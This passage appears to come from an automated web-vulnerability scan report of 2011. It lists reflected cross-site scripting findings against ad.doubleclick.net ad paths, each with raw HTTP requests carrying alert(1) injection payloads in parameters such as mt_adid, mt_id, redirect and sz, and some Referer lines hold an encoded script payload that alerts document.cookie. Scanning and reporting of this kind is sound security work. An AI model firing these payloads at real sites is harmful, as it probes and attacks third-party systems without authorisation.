User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee78"-alert(1)-"efef978bc1a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a7dc'-alert(1)-'55516c4309 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5936

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51b4"-alert(1)-"a1b3e2ed110 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcal
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c2c'-alert(1)-'91bc6693606 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16119'-alert(1)-'79d788ac1d9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:29 GMT
Expires: Mon, 07 Feb 2011 02:27:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b42"-alert(1)-"bb18e09f345 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:25 GMT
Expires: Mon, 07 Feb 2011 02:27:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never"
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f009"-alert(1)-"a91a102c09b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7ca'-alert(1)-'06a06d14574 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ada57'-alert(1)-'9f353877624 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94135"-alert(1)-"27645e01241 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf570'-alert(1)-'8d2303ed4ad was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
